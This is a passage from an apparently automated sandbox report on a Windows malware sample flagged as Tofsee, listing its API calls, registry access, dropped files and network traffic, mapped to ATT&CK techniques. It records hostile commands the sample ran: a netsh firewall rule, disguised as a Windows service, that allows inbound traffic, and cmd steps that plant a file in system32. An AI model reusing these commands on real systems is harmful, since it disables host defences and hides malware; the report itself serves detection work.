940000000600000001000000b11d00000200000053657276696365205061636b20310000f8de110008f83000145cb177435cb177d4f830000100000094010f000100000088f73000935cb2774083b977d4a0b17747e79977d4f83000010000000100000050e411000000000058f7300088f73000f4f7300095e1ad7737141800feffffffd4a0b1771bbeac750000107600000000 (UID: 00000000-00004284)\n \"rtmxemaq.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5cb0774379ac75ffffffff0c0000004c62b0771f79ac75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e170000000000 (UID: 00000000-00003744)\n \"netsh.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002212)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" queries volume information of \"C:\\\" at 00000000-00006024-0000010C-1978012\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" queries volume information of \"C:\\\" at 00000000-00006024-0000010C-1979703\n \"rtmxemaq.exe\" queries volume information of \"C:\\\" at 00000000-00003744-0000010C-1711361\n \"rtmxemaq.exe\" queries volume information of \"C:\\\" at 00000000-00003744-0000010C-1712691\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003660-0000010C-36382\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003660-0000010C-662459\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003660-0000010C-2200509\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003660-0000010C-2201879", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00003660)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e6500fce2120080f41177000065000000000089f4117787c5cdb30200000070e312006ce3120064e2120068e2120018e4120095e1ad77b4c01800c0e21200c83a1b7734e31200d58c137770e3120004e3120042a41177a8021b7744e31200d2f41177080000006ef5117744f511773fc4cdb30200000070aac46e0000130026bbc46e18e31200020000000000130070aac46e48e3120042a41177a8021b778ce3120010a9c46e08000000e6a8c46e9ee6d6b30200000070aac46e0000130026bbc46eac0e6500780e650058e312008050d06e18e41200f9f2c86efaad00dd (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000006fc0c0780300000044e55a0166ec8bb2a01600008ce55a01c0e45a01590000000300000048e45a0150e45a0118e65a0150b89172c28742c1feffffff98e55a016fe490726fc0c07898e55a017ce49072060000000000016b010000008fe490723333ff040600000003000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e55a01000000008e00000044e65a01feffffffcce55a01cf00b277d600b2776839f3768e0000004700000044e65a0100000000a0e55a010000000008e65a01 (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008b7186b244de5a016d82d3758c48370004010000 (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000610036003400630038003000660063006300370032003900320066003300630063003100650039003400330031003200390035003300340039003900370032006500630066006500620034003100300061003700360035003100370064003900660034002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2bb1775414f376d8ebc477ac012f0000002f0000000000000000000400e800c3000000000000000000000000000000000000000500e300c3000000000000000000000008702f0000000000200000000000000000000000 (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002f0030853900000000003e00003e340000c058873900d09a390058463700f001000000002f000400000030853900acee5a010464b17738012f00e063b1770832f3760000000000002f00388539006dd10676f17f9db26cae70770000000000000000f4010000d09a3900d82f2f000100000000002f0050012f000c00000038853900d82f2f000200000218000000a3300093820000000000000000000000030000004cee5a01820000007f07000000000000a330009302000000c0750e76d09a390000000000c0750e7668ee5a01e8302f0000000000d82f2f00c0ee5a01ff2bb177 (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000405562f10300000044e55a0166ec8bb2f81700008ce55a01c0e45a015b0000000300000048e45a0150e45a0118e65a0150b89172c28742c1feffffff98e55a016fe49072405562f198e55a017ce49072820500000000016b010000008fe490723333ff048205000004000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002f00307e3900000000003e00003e340000c058803900d09a3900d0833900f001000000002f0004000000307e3900acee5a010464b17738012f00e063b1770832f3760000000000002f00387e39006dd10676f17f9db26cae70770000000000000000e0000000d09a3900d82f2f000100000000002f0050012f000c000000387e3900d82f2f000200000218000000f00200f2820000000000000000000000030000004cee5a018200000070020000000000002f36001902000000c0750e76707e3a0000000000c0750e7668ee5a0148302f0000000000d82f2f00c0ee5a01ff2bb177 (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000008d6e9dcf0300000044e55a0166ec8bb29c1700008ce55a01c0e45a015b0000000300000048e45a0150e45a0118e65a0150b89172c28742c1feffffff98e55a016fe490728d6e9dcf98e55a017ce49072820500000000016b010000008fe490723333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00006024)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"IsWow64Process\" with parameter \"6024\" - (UID: 00000000-00006024)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006024)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"rtmxemaq.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetForegroundWindow\" (UID: 00000000-00006024)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00003744-20402-273-0040B211", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002212)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00002212)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00006024)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"svchost.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000009a0935f2cb8a00000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000bd2db7679933b7670000000000000000\" - (UID: 00000000-00003660)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"sc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rtmxemaq.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"rtmxemaq.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"svchost.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"4761d0\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"2488612\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00002212)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00002212)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"rtmxemaq.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\XTBLSMOS\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\rtmxemaq.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4\" claimed CRC 231695 while the actual is CRC 14698634\n \"rtmxemaq.exe\" claimed CRC 231695 while the actual is CRC 5248388", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\rtmxemaq.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4\" has section name .text with entropy \"6.63010280368\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4\" has section name .text with entropy \"7.97285529131\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4\" has section name .reloc with entropy \"6.22149605003\"\n \"rtmxemaq.exe\" has section name .text with entropy \"6.63010280368\"\n \"rtmxemaq.exe\" has section name .text with entropy \"7.97285529131\"\n \"rtmxemaq.exe\" has section name .reloc with entropy \"6.22149605003\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00006024)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Pattern Matching", "identifier": "yara-0", "type": 13, "relevance": 9, "name": "YARA signature match", "description": "YARA signature \"MALWARE_Win_Tofsee\" matched process \"00000000-00006024\" as \"Detects Tofsee\" (Author: ditekSHen)\n YARA signature \"MALWARE_Win_Tofsee\" matched process \"00000000-00003744\" as \"Detects Tofsee\" (Author: ditekSHen)", "origin": "YARA Signature"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (UID: 00000000-00006024)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\xtblsmos\\\\\" (UID: 00000000-00006020)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y 